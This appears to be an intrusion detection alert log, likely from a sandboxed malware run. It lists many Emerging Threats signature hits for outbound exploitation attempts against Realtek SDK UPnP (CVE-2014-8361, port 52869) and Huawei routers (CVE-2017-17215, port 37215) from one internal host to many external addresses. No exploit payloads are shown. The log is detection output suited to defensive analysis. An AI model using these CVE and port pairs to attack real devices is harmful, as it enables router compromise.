                                      07/20/24-23:01:42.761962TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614884052869192.168.2.23205.59.131.231
                                      07/20/24-23:01:47.921416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4590652869192.168.2.23103.0.203.61
                                      07/20/24-23:01:08.655109TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23434852869192.168.2.2357.92.179.211
                                      07/20/24-23:01:40.307219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3786637215192.168.2.2390.71.230.151
                                      07/20/24-23:01:44.277250TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4560052869192.168.2.2399.220.126.213
                                      07/20/24-23:02:10.589521TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614032652869192.168.2.2382.227.232.160
                                      07/20/24-23:01:27.651332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5228637215192.168.2.23197.146.181.144
                                      07/20/24-23:01:43.946380TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615015652869192.168.2.23114.188.204.238
                                      07/20/24-23:01:44.963815TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4280252869192.168.2.23203.128.56.168
                                      07/20/24-23:01:47.858878TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615591052869192.168.2.23179.57.28.204
                                      07/20/24-23:01:03.107449TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615544452869192.168.2.23183.49.28.217
                                      07/20/24-23:01:24.889164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4929237215192.168.2.23157.59.34.22
                                      07/20/24-23:01:21.951975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4426037215192.168.2.23197.168.17.251
                                      07/20/24-23:01:54.859884TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4943852869192.168.2.23120.82.97.31
                                      07/20/24-23:01:44.389834TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25453252869192.168.2.2323.3.191.75
                                      07/20/24-23:01:42.287237TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24400852869192.168.2.2332.178.44.200
                                      07/20/24-23:01:52.976222TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24986252869192.168.2.2387.107.52.197
                                      07/20/24-23:00:59.204975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4983637215192.168.2.23197.55.44.167
                                      07/20/24-23:01:08.588009TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5992452869192.168.2.23104.178.230.186
                                      07/20/24-23:01:41.205247TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614856052869192.168.2.23164.43.137.199
                                      07/20/24-23:01:14.100332TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5263037215192.168.2.2389.245.53.30
                                      07/20/24-23:01:13.976791TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615712252869192.168.2.23136.56.196.147
                                      07/20/24-23:02:09.237639TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5675452869192.168.2.23150.220.0.209
                                      07/20/24-23:01:11.634077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4337237215192.168.2.23150.154.154.148
                                      07/20/24-23:01:41.217142TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613312052869192.168.2.231.26.245.187
                                      07/20/24-23:02:08.319876TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4558052869192.168.2.2372.122.103.48
                                      07/20/24-23:01:41.260371TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4730452869192.168.2.2375.161.254.133
                                      07/20/24-23:01:08.575986TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25978452869192.168.2.2370.59.242.166
                                      07/20/24-23:01:43.030153TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614060452869192.168.2.23101.157.175.20
                                      07/20/24-23:02:17.269055TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25142052869192.168.2.2391.117.171.160
                                      07/20/24-23:01:11.634077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3708237215192.168.2.2341.36.118.151
                                      07/20/24-23:01:24.832675TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615924252869192.168.2.2324.104.161.240
                                      07/20/24-23:01:11.817297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6085837215192.168.2.2341.198.81.15
                                      07/20/24-23:01:31.975513TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4519437215192.168.2.23157.217.25.84
                                      07/20/24-23:01:42.304767TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613330652869192.168.2.23153.201.149.50
                                      07/20/24-23:01:58.961047TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5511852869192.168.2.23161.100.49.199
                                      07/20/24-23:01:43.190670TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615190052869192.168.2.2317.241.55.92
                                      07/20/24-23:01:08.611391TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3882652869192.168.2.23161.20.12.87
                                      07/20/24-23:01:54.545885TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5912252869192.168.2.2341.28.215.223
                                      07/20/24-23:01:00.634292TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3876837215192.168.2.2364.62.112.142
                                      07/20/24-23:01:44.415588TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615325652869192.168.2.23133.125.214.226
                                      07/20/24-23:01:44.624686TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4565052869192.168.2.23180.49.147.96
                                      07/20/24-23:01:47.700893TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615524052869192.168.2.23216.145.37.57
                                      07/20/24-23:01:43.210798TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4647252869192.168.2.23173.144.227.253
                                      07/20/24-23:01:27.725851TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5922237215192.168.2.23197.46.153.191
                                      07/20/24-23:02:07.984371TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614225652869192.168.2.2367.242.12.13
                                      07/20/24-23:01:42.555718TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3521652869192.168.2.23165.210.119.115
                                      07/20/24-23:01:45.165718TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3326052869192.168.2.23125.137.245.127
                                      07/20/24-23:01:20.181938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3545837215192.168.2.2323.105.53.195
                                      07/20/24-23:01:01.143446TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615263852869192.168.2.23164.189.55.135
                                      07/20/24-23:01:42.962388TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3696852869192.168.2.23199.44.188.95
                                      07/20/24-23:00:59.203960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3966837215192.168.2.23157.53.103.29
                                      07/20/24-23:01:00.641498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5341037215192.168.2.2319.199.208.241
                                      07/20/24-23:01:04.114673TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4870237215192.168.2.2341.9.233.106
                                      07/20/24-23:01:40.343151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5837437215192.168.2.23157.145.121.60
                                      07/20/24-23:02:17.128772TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4108652869192.168.2.23184.199.50.191
                                      07/20/24-23:01:42.111275TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4862252869192.168.2.23159.247.88.93
                                      07/20/24-23:01:45.144955TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615789852869192.168.2.23154.117.210.216
                                      07/20/24-23:01:46.109136TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5980052869192.168.2.23111.211.116.144
                                      07/20/24-23:02:02.772130TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615953852869192.168.2.23189.55.165.96
                                      07/20/24-23:02:11.592030TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4565852869192.168.2.2368.53.164.7
                                      07/20/24-23:00:57.221504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4663237215192.168.2.23197.17.13.46
                                      07/20/24-23:01:42.090121TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4351052869192.168.2.2385.101.71.143
                                      07/20/24-23:01:07.021159TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6052637215192.168.2.2341.63.85.196
                                      07/20/24-23:01:08.562013TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24491452869192.168.2.23155.42.58.223
                                      07/20/24-23:01:32.076593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3890637215192.168.2.23157.204.232.233
                                      07/20/24-23:01:41.303669TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5297652869192.168.2.23193.229.91.171
                                      07/20/24-23:01:41.660997TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3954052869192.168.2.23124.109.117.107
                                      07/20/24-23:01:53.308763TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5386052869192.168.2.2381.50.220.234
                                      07/20/24-23:01:45.547334TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5995452869192.168.2.2323.210.80.134
                                      07/20/24-23:01:49.469876TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614976852869192.168.2.23116.148.59.65
                                      07/20/24-23:01:44.099799TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613985252869192.168.2.23139.85.109.63
                                      07/20/24-23:00:59.172943TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4311837215192.168.2.23197.65.44.128
                                      07/20/24-23:01:40.355589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5778437215192.168.2.23197.66.63.246
                                      07/20/24-23:01:44.795218TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25544052869192.168.2.2336.130.15.144
                                      07/20/24-23:00:57.221550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4181837215192.168.2.23207.93.222.13
                                      07/20/24-23:01:41.478928TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613666852869192.168.2.23113.184.252.189
                                      07/20/24-23:01:08.578727TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4838052869192.168.2.23122.204.212.245
                                      07/20/24-23:01:08.589760TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3963652869192.168.2.2318.37.139.58
                                      07/20/24-23:01:44.452219TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615063852869192.168.2.23153.197.27.100
                                      07/20/24-23:01:31.975158TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3771637215192.168.2.23197.229.171.249
                                      07/20/24-23:01:44.756264TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24913252869192.168.2.2375.52.105.57
                                      07/20/24-23:02:06.393178TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3735652869192.168.2.23169.213.252.233
                                      07/20/24-23:01:41.165469TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614841852869192.168.2.2373.113.35.189
                                      07/20/24-23:02:14.945129TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4953652869192.168.2.2363.25.37.64
                                      07/20/24-23:00:59.157444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3703837215192.168.2.23107.136.23.140
                                      07/20/24-23:01:43.843278TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24005252869192.168.2.23159.183.134.67
                                      07/20/24-23:01:31.322110TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24698252869192.168.2.23123.145.45.176
                                      07/20/24-23:01:46.783122TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614220252869192.168.2.23164.23.204.131
                                      07/20/24-23:01:54.859884TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615707052869192.168.2.23155.152.164.248
                                      07/20/24-23:01:45.484487TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5179852869192.168.2.23210.209.80.73
                                      07/20/24-23:02:04.022245TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5137852869192.168.2.23212.213.14.74
                                      07/20/24-23:01:43.825431TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615843452869192.168.2.2324.200.205.123
                                      07/20/24-23:01:11.630649TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4363037215192.168.2.23197.208.141.188
                                      07/20/24-23:01:45.294002TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3717052869192.168.2.23190.13.238.183
                                      07/20/24-23:01:48.394890TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6025052869192.168.2.2313.193.24.191
                                      07/20/24-23:01:45.511523TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3766252869192.168.2.23165.221.172.161
                                      07/20/24-23:01:51.183470TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614773852869192.168.2.23107.137.22.219
                                      07/20/24-23:02:42.973189TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4125052869192.168.2.2390.6.68.219
                                      07/20/24-23:02:01.256492TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5158052869192.168.2.2357.77.183.106
                                      07/20/24-23:01:41.919931TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5341252869192.168.2.23193.229.91.171
                                      07/20/24-23:01:59.676169TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4927852869192.168.2.23165.63.9.134
                                      07/20/24-23:01:45.298540TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25841652869192.168.2.23104.39.87.115
                                      07/20/24-23:01:46.725077TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613347452869192.168.2.2337.189.26.199
                                      07/20/24-23:03:46.099099TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4752452869192.168.2.23159.83.233.195
                                      07/20/24-23:01:02.066908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3733837215192.168.2.2341.126.153.94
                                      07/20/24-23:01:04.034952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5104237215192.168.2.23197.80.209.101
                                      07/20/24-23:01:21.915268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4486637215192.168.2.23157.246.199.209
                                      07/20/24-23:01:08.572790TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25676052869192.168.2.2324.167.37.167
                                      07/20/24-23:00:59.204975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4084237215192.168.2.2341.241.135.76
                                      07/20/24-23:01:07.075937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5514637215192.168.2.2341.83.154.226
                                      07/20/24-23:01:45.472422TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4962852869192.168.2.2377.216.216.160
                                      07/20/24-23:00:57.221132TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3717437215192.168.2.23157.233.134.27
                                      07/20/24-23:01:11.630767TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4664637215192.168.2.2381.64.188.238
                                      07/20/24-23:01:51.916673TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3571652869192.168.2.23124.74.75.114
                                      07/20/24-23:01:41.378872TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613851052869192.168.2.23160.67.56.20
                                      07/20/24-23:01:08.677189TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25905652869192.168.2.235.53.123.92
                                      07/20/24-23:01:42.608320TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5323052869192.168.2.23153.109.210.254
                                      07/20/24-23:01:02.054387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5357437215192.168.2.23221.165.24.130
                                      07/20/24-23:02:17.110283TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24386652869192.168.2.2361.237.192.205
                                      07/20/24-23:01:20.110861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5756437215192.168.2.2341.198.222.41
                                      07/20/24-23:01:42.651912TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24720052869192.168.2.23209.170.78.160
                                      07/20/24-23:01:25.001980TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4093652869192.168.2.23199.241.141.173
                                      07/20/24-23:01:57.297792TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613624052869192.168.2.2336.5.79.111
                                      07/20/24-23:01:01.510385TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4428252869192.168.2.2336.193.87.124
                                      07/20/24-23:01:44.881852TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4779252869192.168.2.23212.188.148.79
                                      07/20/24-23:01:45.622888TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5752052869192.168.2.2374.81.74.58
                                      07/20/24-23:01:42.790558TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3392652869192.168.2.2394.18.60.159
                                      07/20/24-23:01:32.032492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5362437215192.168.2.23157.196.127.144
                                      07/20/24-23:01:42.580745TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3644052869192.168.2.23106.27.196.147
                                      07/20/24-23:01:11.820979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5055437215192.168.2.2341.138.109.222
                                      07/20/24-23:01:43.111685TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613922652869192.168.2.238.242.14.128
                                      07/20/24-23:01:43.160211TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23897852869192.168.2.23200.2.226.98
                                      07/20/24-23:01:00.636533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5209837215192.168.2.23157.225.33.253
                                      07/20/24-23:01:14.035496TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3406837215192.168.2.23190.5.182.99
                                      07/20/24-23:01:08.598416TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23836452869192.168.2.232.10.234.63
                                      07/20/24-23:01:45.096837TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23994652869192.168.2.23145.21.134.81
                                      07/20/24-23:01:41.897768TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4519852869192.168.2.23205.156.124.10
                                      07/20/24-23:01:08.668802TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23733452869192.168.2.23205.45.42.138
                                      07/20/24-23:01:24.915904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3640437215192.168.2.23197.160.117.230
                                      07/20/24-23:01:09.002255TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3811652869192.168.2.239.91.73.111
                                      07/20/24-23:01:44.469869TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5322652869192.168.2.23156.42.244.253
                                      07/20/24-23:01:11.641686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3362637215192.168.2.2341.162.241.10
                                      07/20/24-23:01:20.202325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4968637215192.168.2.23119.225.217.146
                                      07/20/24-23:02:22.907274TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3645652869192.168.2.23211.143.251.133
                                      07/20/24-23:01:02.139489TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5226452869192.168.2.2337.205.238.167
                                      07/20/24-23:01:43.243266TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5967252869192.168.2.23142.215.251.21
                                      07/20/24-23:01:06.994337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4572237215192.168.2.2341.219.238.149
                                      07/20/24-23:01:25.035135TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615760052869192.168.2.23184.170.117.213
                                      07/20/24-23:01:50.212921TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4372252869192.168.2.2318.71.115.72
                                      07/20/24-23:01:43.227281TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614762252869192.168.2.2327.86.156.82
                                      07/20/24-23:02:14.728323TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615519052869192.168.2.23132.156.134.177
                                      07/20/24-23:01:24.603339TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615653652869192.168.2.2376.83.139.165
                                      07/20/24-23:01:57.269160TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615307052869192.168.2.23138.120.228.47
                                      07/20/24-23:01:43.951862TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615523852869192.168.2.23210.201.123.76
                                      07/20/24-23:01:46.158533TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5466252869192.168.2.2381.48.180.48
                                      07/20/24-23:01:14.090830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5584037215192.168.2.2341.240.65.224
                                      07/20/24-23:01:42.985320TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3490252869192.168.2.2385.91.68.35
                                      07/20/24-23:01:00.648489TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3653637215192.168.2.23157.118.19.128
                                      07/20/24-23:01:32.076593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5301237215192.168.2.2341.72.207.45
                                      07/20/24-23:01:42.688831TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5826652869192.168.2.2353.13.47.10
                                      07/20/24-23:01:53.432917TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3659052869192.168.2.23141.86.15.181
                                      07/20/24-23:01:53.459445TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25640052869192.168.2.2346.179.46.173
                                      07/20/24-23:01:25.468217TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5459852869192.168.2.2335.92.216.124
                                      07/20/24-23:01:20.131339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6086637215192.168.2.2341.20.237.244
                                      07/20/24-23:01:04.985241TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4407652869192.168.2.2327.181.35.71
                                      07/20/24-23:01:00.651026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5153437215192.168.2.23157.187.188.100
                                      07/20/24-23:01:07.075937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4513037215192.168.2.23157.1.231.94
                                      07/20/24-23:01:51.925038TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3686252869192.168.2.23191.56.81.141
                                      07/20/24-23:01:04.094795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4992237215192.168.2.2341.65.35.124
                                      07/20/24-23:01:27.651187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4985037215192.168.2.23197.49.83.49
                                      07/20/24-23:01:41.218109TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3566852869192.168.2.23176.90.235.184
                                      07/20/24-23:01:42.276859TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5227852869192.168.2.23193.38.103.224
                                      07/20/24-23:01:42.643745TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25362852869192.168.2.23101.9.169.24
                                      07/20/24-23:01:42.460493TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614162452869192.168.2.2375.212.169.191
                                      07/20/24-23:01:44.024775TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4540252869192.168.2.2345.226.155.34
                                      07/20/24-23:01:54.922661TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4118252869192.168.2.2362.211.74.184
